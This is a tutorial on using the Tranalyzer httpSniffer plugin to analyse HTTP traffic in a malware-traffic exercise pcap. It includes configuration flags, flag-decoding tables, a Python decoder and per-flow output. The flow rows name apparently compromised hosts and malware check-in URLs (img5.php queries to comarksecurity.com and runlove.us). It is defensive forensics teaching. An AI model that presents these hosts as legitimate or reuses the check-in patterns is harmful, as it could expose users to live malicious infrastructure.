HTTP: HyperText Transfer Protocol
Introduction
This tutorial discusses the plugin httpSniffer.
Preparation
First, restore T2 into a pristine state by removing all unnecessary or older plugins from the plugin folder ~/.tranalyzer/plugins:
t2build -e -y
Are you sure you want to empty the plugin folder '/home/wurst/.tranalyzer/plugins' (y/N)? yes
Plugin folder emptied
Then compile the core (tranalyzer2) and the following plugins:
t2build tranalyzer2 basicFlow tcpStates httpSniffer txtSink
...
BUILD SUCCESSFUL
If you have not created separate data and results directories yet, do it now in another bash window; it facilitates your workflow:
mkdir ~/data ~/results
The sample PCAP used in this tutorial can be downloaded here: 2015-05-08-traffic-analysis-exercise.pcap (Source: malware-traffic-analysis.net).
Please save it in your ~/data folder.
Now you are all set for analyzing HTTP traffic!
httpSniffer
Let’s look at the plugin configuration first:
httpSniffer
vi src/httpSniffer.h
As you can see below, you can enable or disable any HTTP field in the protocol to tailor the flow output to your needs. Note that some fields can be aggregated in the output to avoid multiple entries, which eat up your flow space. By default everything is enabled.
Any content (pictures, videos, text, ...) can be extracted into files by enabling the HTTP_SAVE_* constants. As this function can produce an extensive number of files from large pcaps, it is advisable to run the plugin first without the extract function. All paths can be changed and reside by default under the /tmp directory.
...
/* ========================================================================== */
/* ------------------------ USER CONFIGURATION FLAGS ------------------------ */
/* ========================================================================== */
#define HTTP_MIME 1 // 1: print mime type in flow file; 0: print # of mime types only
#define HTTP_STAT 1 // 1: print response status code in flow file; 0: print # of status codes only
#define HTTP_MCNT 1 // 1: method counts: GET, POST
#define HTTP_HOST 1 // 1: print hosts in flow file; 0: print # of hosts only
#define HTTP_URL 1 // 1: print URL in flow file; 0: print # of URL only
#define HTTP_COOKIE 1 // 1: print cookies in flow file; 0: print # of cookies only
#define HTTP_IMAGE 1 // 1: print image name in flow file; 0: print # of images only
#define HTTP_VIDEO 1 // 1: print video name in flow file; 0: print # of videos only
#define HTTP_AUDIO 1 // 1: print audio name in flow file; 0: print # of audios only
#define HTTP_MSG 1 // 1: print message name in flow file; 0: print # of messages only
#define HTTP_APPL 1 // 1: print application name in flow file; 0: print # of applications only
#define HTTP_TEXT 1 // 1: print text name in flow file; 0: print # of texts only
#define HTTP_PUNK 1 // 1: print POST/unknown and all else name in flow file; 0: print # of POST/unknown/else only
#define HTTP_BODY 1 // 1: content body exam, print anomaly bits in flow file; 0: none
#define HTTP_BDURL 1 // 1: print body url name in flow file; 0: none
#define HTTP_USRAG 1 // 1: print User-Agents in flow file; 0: none
#define HTTP_XFRWD 1 // 1: print X-Forward-For in flow file; 0: none
#define HTTP_REFRR 1 // 1: print Referer in flow file; 0: none
#define HTTP_VIA 1 // 1: print Via in flow file; 0: none
#define HTTP_LOC 1 // 1: print Location in flow file; 0: none
#define HTTP_SERV 1 // 1: print Server in flow file; 0: none
#define HTTP_PWR 1 // 1: print X-Powered-By in flow file; 0: none
#define HTTP_STATAGA 1 // 1: aggregate stat response in flow file; 0: dont
#define HTTP_MIMEAGA 1 // 1: aggregate mime response in flow file; 0: dont
#define HTTP_HOSTAGA 1 // 1: aggregate Host in flow file; 0: dont
#define HTTP_URLAGA 1 // 1: aggregate URL in flow file; 0: dont
#define HTTP_USRAGA 1 // 1: aggregate User-Agents in flow file; 0: dont
#define HTTP_XFRWDA 1 // 1: aggregate X-Forwarded-For in flow file; 0: dont
#define HTTP_REFRRA 1 // 1: aggregate Referer in flow file; 0: dont
#define HTTP_VIAA 1 // 1: aggregate Via in flow file; 0: dont
#define HTTP_LOCA 1 // 1: aggregate Location in flow file; 0: dont
#define HTTP_SERVA 1 // 1: aggregate Server in flow file; 0: dont
#define HTTP_PWRA 1 // 1: aggregate X-Powered-By in flow file; 0: dont
//#define HTTP_ENT 0 // entropy calculation, not implemented yet
// data carving modes
#define HTTP_SAVE_IMAGE 0 // 1: Save images in files under HTTP_IMAGE_PATH; 0: Don't save images
#define HTTP_SAVE_VIDEO 0 // 1: Save videos in files under HTTP_VIDEO_PATH; 0: Don't save videos
#define HTTP_SAVE_AUDIO 0 // 1: Save audios in files under HTTP_AUDIO_PATH; 0: Don't save audios
#define HTTP_SAVE_MSG 0 // 1: Save messages in files under HTTP_MSG_PATH; 0: Don't save messages
#define HTTP_SAVE_TEXT 0 // 1: Save texts in files under HTTP_TEXT_PATH; 0: Don't save text
#define HTTP_SAVE_APPL 0 // 1: Save applications in files under HTTP_APPL_PATH; 0: Don't save applications
#define HTTP_SAVE_PUNK 0 // 1: Save PUT/else content in files under HTTP_PUNK_PATH; 0: Don't save PUT content
#define HTTP_DATA_C_MAX 40 // Maximum dimension of storage arrays per flow
#define HTTP_MXFILE_LEN 80 // Maximum storage name length
#define HTTP_MXUA_LEN 400 // User-Agent length
#define HTTP_MXXF_LEN 80 // X-Forwarded-For length
//#define HTTP_MXCK_LEN 150 // maximum cookie
//#define HTTP_MAXPBIN (1 << 8)
/* +++++++++++++++++++++ ENV / RUNTIME - conf Variables +++++++++++++++++++++ */
#define HTTP_RMDIR 1 // empty HTTP_*_PATH before starting (requires at least one HTTP_SAVE_*=1)
// User defined storage boundary conditions
#define HTTP_PATH "/tmp" // Root path for extracted files
#define HTTP_IMAGE_PATH "httpPicture" // Path for pictures
#define HTTP_VIDEO_PATH "httpVideo" // Path for videos
#define HTTP_AUDIO_PATH "httpAudio" // Path for audios
#define HTTP_MSG_PATH "httpMSG" // Path for messages
#define HTTP_TEXT_PATH "httpText" // Path for texts
#define HTTP_APPL_PATH "httpAppl" // Path for applications
#define HTTP_PUNK_PATH "httpPunk" // Path for POST / else / unknown content
#define HTTP_NONAME "nudel" // name of files without name
/* ========================================================================== */
/* ------------------------- DO NOT EDIT BELOW HERE ------------------------- */
/* ========================================================================== */
...
Now run t2 on the supplied pcap:
================================================================================
Tranalyzer 0.9.1 (Anteater), Cobra. PID: 28406, Prio: 0, SID: 666
================================================================================
[INF] Creating flows for L2, IPv4, IPv6
Active plugins:
    01: basicFlow, 0.9.1
    02: tcpStates, 0.9.1
    03: httpSniffer, 0.9.1
    04: txtSink, 0.9.1
[INF] IPv4 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 481438 (481.44 K)
[INF] IPv6 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 41486 (41.49 K)
Processing file: /home/user/data/2015-05-08-traffic-analysis-exercise.pcap
Link layer type: Ethernet [EN10MB/1]
Snapshot length: 65535 (65.53 K)
Dump start: 1431031896.723375000 sec (Thu 07 May 2015 20:51:36 GMT)
Dump stop : 1431032021.842982000 sec (Thu 07 May 2015 20:53:41 GMT)
Total dump duration: 125.119607000 sec (2m 5s)
Finished processing. Elapsed time: 0.014296888 sec
Finished unloading flow memory. Time: 0.014935613 sec
Percentage completed: 100.00%
Number of processed packets: 761
Number of processed bytes: 495665 (495.67 K)
Number of raw bytes: 495665 (495.67 K)
Number of pad bytes: 1857 (1.86 K)
Number of pcap bytes: 507865 (507.87 K)
Number of IPv4 packets: 761 [100.00%]
Number of A packets: 305 [40.08%]
Number of B packets: 456 [59.92%]
Number of A bytes: 34638 (34.64 K) [6.99%]
Number of B bytes: 461027 (461.03 K) [93.01%]
<A packet load>: 113.57
<B packet load>: 1011.02
--------------------------------------------------------------------------------
tcpStates: Aggregated tcpStatesAFlags=0x42
httpSniffer: Aggregated httpStat=0x003c
httpSniffer: Aggregated httpAFlags=0x1103
httpSniffer: Aggregated httpCFlags=0x0010
httpSniffer: Aggregated httpHeadMimes=0x0045
httpSniffer: Number of files img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0
httpSniffer: Number of HTTP packets: 399 [52.43%]
httpSniffer: Number of HTTP GET requests: 28 [7.02%]
httpSniffer: Number of HTTP POST requests: 9 [2.26%]
httpSniffer: HTTP GET/POST ratio: 3.11
--------------------------------------------------------------------------------
Headers count: min: 3, max: 3, avg: 3.00
Number of TCP packets: 745 [97.90%]
Number of TCP bytes: 493885 (493.88 K) [99.64%]
Number of UDP packets: 16 [2.10%]
Number of UDP bytes: 1780 (1.78 K) [0.36%]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Number of processed flows: 68
Number of processed IPv4 flows: 68 [100.00%]
Number of processed A flows: 34 [50.00%]
Number of processed B flows: 34 [50.00%]
Number of request flows: 34 [50.00%]
Number of reply flows: 34 [50.00%]
Total A/B flow asymmetry: 0.00
Total req/rply flow asymmetry: 0.00
Number of processed A+B packets/A+B flows: 11.19
Number of processed A packets/A flows: 8.97
Number of processed B packets/ B flows: 13.41
Number of processed total packets/s: 6.08
Number of processed A+B packets/s: 6.08
Number of processed A packets/s: 2.44
Number of processed B packets/s: 3.64
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<Number of processed flows/s>: 0.54
<Bandwidth>: 31574 b/s (31.57 Kb/s)
<Raw bandwidth>: 31692 b/s (31.69 Kb/s)
Max number of flows in memory: 56 [0.02%]
Memory usage: 0.04 GB [0.05%]
Aggregated flowStat=0x0400000000004000
[INF] IPv4 flows
So the aggregated httpStat tells us there is HTTP.

The httpStat column with value 0x003c is to be interpreted as follows:

bit | httpStat | Description
=============================================================================
  2 | 0x0004   | Internal state: pending URL name
  3 | 0x0008   | HTTP flow
  4 | 0x0010   | Internal state: Chunked transfer
  5 | 0x0020   | Internal state: HTTP flow detected

The httpAFlags column with value 0x1103 is to be interpreted as follows:

bit | httpAFlags | Description
=============================================================================
  0 | 0x0001     | POST query with parameters
  1 | 0x0002     | Host is IPv4, e.g., Host: 1.2.3.4
  8 | 0x0100     | X-Site Scripting protection
 12 | 0x1000     | Possible EXE download

The httpCFlags column with value 0x0010 is to be interpreted as follows:

bit | httpCFlags | Description
=============================================================================
  4 | 0x0010     | Potential HTTP content

The httpHeadMimes column with value 0x0045 is to be interpreted as follows:

bit | httpHeadMimes | Description
=============================================================================
  0 | 0x0001        | Application
  2 | 0x0004        | Image
  6 | 0x0040        | Text
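The aggregated values above only say that some flow in the pcap set a given bit; to see which flows did, the same bit tables have to be applied to the httpStat/httpAFlags/httpCFlags/httpHeadMimes columns of each row in the flow file. The following is an added example (not part of this tutorial or of the httpSniffer plugin) that decodes a flag value into the descriptions listed on this page and reports any set bit that the page does not document, and then locates, among the per-flow httpAFlags values, the flows that carry bit 12 (Possible EXE download). The per-flow values in the main block are a constructed sample taken from the flow output shown further below.

```python
# Added example: decode httpSniffer flag columns with the bit tables from the
# tutorial. Only the bits documented on this page are named; any other set
# bit is reported as undocumented rather than silently ignored.

HTTPSTAT_BITS = {
    0x0004: "Internal state: pending URL name",
    0x0008: "HTTP flow",
    0x0010: "Internal state: Chunked transfer",
    0x0020: "Internal state: HTTP flow detected",
}
HTTPAFLAGS_BITS = {
    0x0001: "POST query with parameters",
    0x0002: "Host is IPv4, e.g., Host: 1.2.3.4",
    0x0100: "X-Site Scripting protection",
    0x1000: "Possible EXE download",
}
HTTPCFLAGS_BITS = {
    0x0010: "Potential HTTP content",
}
HTTPHEADMIMES_BITS = {
    0x0001: "Application",
    0x0004: "Image",
    0x0040: "Text",
}

EXE_DOWNLOAD = 0x1000  # httpAFlags bit 12 from the table above


def decode_flags(value, table):
    """Return the description of every bit set in a 16-bit flag value,
    lowest bit first, e.g. decode_flags(0x003c, HTTPSTAT_BITS)."""
    out = []
    for bit in range(16):
        mask = 1 << bit
        if value & mask:
            out.append(table.get(mask, f"bit {bit} (0x{mask:04x}): not listed on this page"))
    return out


def decode_aggregates(stat, aflags, cflags, mimes):
    """Decode the four 'Aggregated ...' values printed at the end of a t2 run."""
    return {
        "httpStat": decode_flags(stat, HTTPSTAT_BITS),
        "httpAFlags": decode_flags(aflags, HTTPAFLAGS_BITS),
        "httpCFlags": decode_flags(cflags, HTTPCFLAGS_BITS),
        "httpHeadMimes": decode_flags(mimes, HTTPHEADMIMES_BITS),
    }


def flows_with_exe_download(rows):
    """rows: (flowInd, dir, httpAFlags) triples as they appear in the flow
    file, httpAFlags as the hex string txtSink prints (e.g. "0x1000").
    Returns the flow indices whose httpAFlags has bit 12 set."""
    return [ind for ind, _dir, aflags in rows if int(aflags, 16) & EXE_DOWNLOAD]


if __name__ == "__main__":
    # the aggregated values from the t2 run above
    for col, descs in decode_aggregates(0x003c, 0x1103, 0x0010, 0x0045).items():
        print(col)
        for d in descs:
            print("   ", d)
    # constructed sample of per-flow httpAFlags values from the flow output
    sample = [("2", "B", "0x0000"), ("8", "B", "0x1000"), ("15", "B", "0x0100")]
    print("flows with possible EXE download:", flows_with_exe_download(sample))
```

Running the block prints the four decoded aggregates and then the single flow index (8) whose reply flow carries the Possible EXE download bit; the same function can be fed every row of the flow file once the httpAFlags column has been extracted with tawk or with the flow-file reader shown later in this tutorial.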
The file counter img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0 reports 13 images, 22 text files and 10 application files. To list the flows that carry any of them, split the httpImg_Vid_Aud_Msg_Txt_App_Unk column on "_" and keep the rows with a non-zero image, text or application count:
tawk '{ split($httpImg_Vid_Aud_Msg_Txt_App_Unk, A, "_"); if (A[1] || A[5] || A[6]) print }' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt | tcol
%dir flowInd flowStat timeFirst timeLast duration numHdrDesc numHdrs hdrDesc srcMac dstMac ethType vlanID srcIP srcIPCC srcIPOrg srcPort dstIP dstIPCC dstIPOrg dstPort l4Proto tcpStatesAFlags httpStat httpAFlags httpMethods httpHeadMimes httpCFlags httpGet_Post httpRSCnt httpRSCode httpURL_Via_Loc_Srv_Pwr_UAg_XFr_Ref_Cky_Mim httpImg_Vid_Aud_Msg_Txt_App_Unk httpHosts httpURL httpMimes httpCookies httpImages httpVideos httpAudios httpMsgs httpAppl httpText httpPunk httpBdyURL httpUsrAg httpXFor httpRefrr httpVia httpLoc httpServ httpPwr
B 2 0x0400000000004001 1431031897.090353000 1431031897.467080000 0.376727000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49184 6 0x00 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__285a4d4e4e5a4d4d4649584c5d43064b4745_2_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 7 0x0400000000004001 1431031898.870027000 1431031899.146185000 0.276158000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49188 6 0x00 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_aa25f5fe2875e3d0a244e6969e589cc4_7_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
A 21 0x0400000000004000 1431031903.508284000 1431031905.661649000 2.153365000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49198 72.34.49.86 us "IHNetworks" 80 6 0x00 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "comarksecurity.com" "/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg" "application/x-www-form-urlencoded" "_wp-content_themes_grizzly_img5.php_c=cdcnw7cfz43rmtg_21_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 21 0x0400000000004001 1431031903.559171000 1431031905.661533000 2.102362000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 72.34.49.86 us "IHNetworks" 80 192.168.138.158 07 "Private network" 49198 6 0x00 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_grizzly_img5.php_c=cdcnw7cfz43rmtg_21_B_1_0" "Apache" "PHP/5.3.29"
A 23 0x0400000000004000 1431031905.838183000 1431031908.624824000 2.786641000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49200 72.34.49.86 us "IHNetworks" 80 6 0x00 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "comarksecurity.com" "/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42" "application/x-www-form-urlencoded" "_wp-content_themes_grizzly_img5.php_t=8r1gf1b2t1kuq42_23_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 23 0x0400000000004001 1431031905.940902000 1431031908.624779000 2.683877000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 72.34.49.86 us "IHNetworks" 80 192.168.138.158 07 "Private network" 49200 6 0x00 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_grizzly_img5.php_t=8r1gf1b2t1kuq42_23_B_1_0" "Apache" "PHP/5.3.29"
B 15 0x0400000000004001 1431031902.907008000 1431031903.049134000 0.142126000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 188.165.164.184 fr "OVH-MNT" 80 192.168.138.158 07 "Private network" 49195 6 0x02 0x0078 0x0100 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_0_0_0_0_0_1 0_0_0_0_1_0_0 "text/plain" "__15_B_1_0" "DYNAMIC+"
A 27 0x0400000000004000 1431031915.188019000 1431031917.179846000 1.991827000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49204 72.34.49.86 us "IHNetworks" 80 6 0x00 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "comarksecurity.com" "/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9" "application/x-www-form-urlencoded" "_wp-content_themes_grizzly_img5.php_u=ka6nnuvccqlw9_27_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 27 0x0400000000004001 1431031915.292307000 1431031917.179749000 1.887442000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 72.34.49.86 us "IHNetworks" 80 192.168.138.158 07 "Private network" 49204 6 0x00 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_grizzly_img5.php_u=ka6nnuvccqlw9_27_B_1_0" "Apache" "PHP/5.3.29"
B 6 0x0400000000004001 1431031897.801147000 1431031961.652768000 63.851621000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49186 6 0x02 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__6_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 32 0x0400000000004001 1431031946.186389000 1431031950.230839000 4.044450000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49208 6 0x02 0x0068 0x0000 0x00 0x0004 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 2_0_0_0_0_0_0 "image/png" "_picture.php_k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764_32_B_1_0";"_img_rb.png_32_B_3_1" "nginx/1.2.1" "PHP/5.4.39-0+deb7u2"
B 5 0x0400000000004001 1431031897.787957000 1431031898.067694000 0.279737000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49185 6 0x02 0x0068 0x0000 0x00 0x0001 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_0_1_0 "application/x-shockwave-flash" "__5_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 8 0x0400000000004001 1431031899.272356000 1431031900.101930000 0.829574000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49189 6 0x02 0x0068 0x1000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__b514ee6f0fe486009a6d83b035a4c0bd_8_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 9 0x0400000000004001 1431031901.437910000 1431031901.594209000 0.156299000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49190 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__b2566564b3ba1a38e61c83957a7dbcd5_9_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 31 0x0400000000004001 1431031946.186400000 1431031952.217120000 6.030720000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49207 6 0x02 0x0068 0x0000 0x00 0x0004 0x0010 0_0 1 200 0_0_0_1_0_0_0_0_0_2 2_0_0_0_0_0_0 "image/png";"image/vnd.microsoft.icon" "_img_flags_es.png_31_B_1_0";"_favicon.ico_31_B_2_1" "nginx/1.2.1"
B 10 0x0400000000004001 1431031901.748731000 1431031901.905523000 0.156792000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49191 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__3a08b0be8322c244f5a1cb9c1057d941_10_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 11 0x0400000000004001 1431031902.059710000 1431031902.440796000 0.381086000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49192 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__d71e0bd86db9587158745a986a4b3606_11_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 12 0x0400000000004001 1431031902.592729000 1431031902.752525000 0.159796000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49193 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__34eaf8bd50d85d8c6baacb45f0a7b22e_12_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 14 0x0400000000004001 1431031902.893639000 1431031903.051071000 0.157432000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49194 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__60dbe33b908e0086292196ef001816bc_14_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
A 18 0x0400000000004000 1431031903.090317000 1431031903.288476000 0.198159000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49197 204.152.254.221 us "Brinkster Communications Corpo" 80 6 0x02 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "runlove.us" "/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg" "application/x-www-form-urlencoded" "_wp-content_themes_twentyfifteen_img5.php_t=cdcnw7cfz43rmtg_18_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 18 0x0400000000004001 1431031903.132272000 1431031903.288564000 0.156292000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 204.152.254.221 us "Brinkster Communications Corpo" 80 192.168.138.158 07 "Private network" 49197 6 0x02 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 404 0_0_0_1_0_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_twentyfifteen_img5.php_t=cdcnw7cfz43rmtg_18_B_1_0" "Apache"
B 16 0x0400000000004001 1431031903.188176000 1431031903.341751000 0.153575000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49196 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__51424ddd486ff06861fceed24e86b329_16_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
A 22 0x0400000000004000 1431031905.650875000 1431031905.834393000 0.183518000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49199 204.152.254.221 us "Brinkster Communications Corpo" 80 6 0x02 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "runlove.us" "/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42" "application/x-www-form-urlencoded" "_wp-content_themes_twentyfifteen_img5.php_l=8r1gf1b2t1kuq42_22_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 22 0x0400000000004001 1431031905.709435000 1431031905.834454000 0.125019000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 204.152.254.221 us "Brinkster Communications Corpo" 80 192.168.138.158 07 "Private network" 49199 6 0x02 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 404 0_0_0_1_0_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_twentyfifteen_img5.php_l=8r1gf1b2t1kuq42_22_B_1_0" "Apache"
A 24 0x0400000000004000 1431031908.613660000 1431031908.779062000 0.165402000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49201 204.152.254.221 us "Brinkster Communications Corpo" 80 6 0x02 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "runlove.us" "/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk" "application/x-www-form-urlencoded" "_wp-content_themes_twentyfifteen_img5.php_u=mfymi71rapdzk_24_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 24 0x0400000000004001 1431031908.667116000 1431031908.779106000 0.111990000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 204.152.254.221 us "Brinkster Communications Corpo" 80 192.168.138.158 07 "Private network" 49201 6 0x02 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 404 0_0_0_1_0_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_twentyfifteen_img5.php_u=mfymi71rapdzk_24_B_1_0" "Apache"
